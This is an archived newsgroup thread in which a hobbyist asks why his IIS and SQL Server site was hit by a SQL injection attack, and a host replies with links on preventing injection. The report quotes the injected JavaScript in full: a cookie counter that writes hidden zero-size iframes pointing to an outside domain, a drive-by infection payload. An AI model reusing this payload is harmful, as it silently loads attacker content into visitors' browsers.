Re: IIS - SQL Tables Hacked - http://yl18.net/

There really is no fool proof way that IIS can protect against everything.
If you truly suffered a SQL injection attack, it could have easily been done
of you are using inline sql statements in your code:

http://www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx
http://www.4guysfromrolla.com/webtech/061902-1.shtml

Those two articles both give great examples and information on how you can
code your pages to minimize and probably prevent SQL injection attacks
entirely.

--
Rick Barber

http://www.orcsweb.com
Managed Complex Hosting
#1 in Service and Support

<peterjonesp1@xxxxxxxxxxxxxx> wrote in message
news:1194338294.344607.113420@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
On my personal IIS and SQL server running my hobby homepages had a
leave me a message set of questions and managed to get my database
tables uploaded with -

This brought my whole system down, I assumed I had full SQL Inject
validation and IIS patching, anyone know of any new vulnerabilies or
suffered the same attack?

Peter.

"function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}

function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}

function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" +
exp.toGMTString();
}
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*8*60*60*1000));

function amt(){
var count = GetCookie('count');
//var count;
//alert(count);
//count = null;
if(count == null) {
SetCookie('count','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('count',newcount,exp);
//DeleteCookie('count')
return newcount
}
}

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function sethome(){
document.write('<iframe src="http://www.yl18.net/0.html"; width="0"
height="0" scrolling="no" frameborder="0"></iframe>');
document.write('<iframe src="http://yl18.net/1.html"; width="0"
height="0" scrolling="no" frameborder="0"></iframe>');

}
if(amt()==1)
{

sethome()
}
document.write('<iframe src="http://yl18.net/z.html"; width="0"
height="0" scrolling="no" frameborder="0"></iframe>');"



.

Relevant Pages

  • LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
    ... LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties ... $offset and $limit vars are not sanitized before to be used to conducte sql injection attacks ... $tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks ...
    (Bugtraq)
  • Re: question about validation and sql injection
    ... Again nothing to do with sql injection. ... Simply run any variable that will be part of a query through ... the best bet is to read in your form data like this.... ... mysql_real_escape_string on that var. ...
    (php.general)
  • RE: [PHP] Getting PHP to work under IIS 6.0
    ... Has anyone been able to get PHP working fully under IIS 6.0? ... the following script: ... execution permissions to no avail. ... echo $var; ...
    (php.general)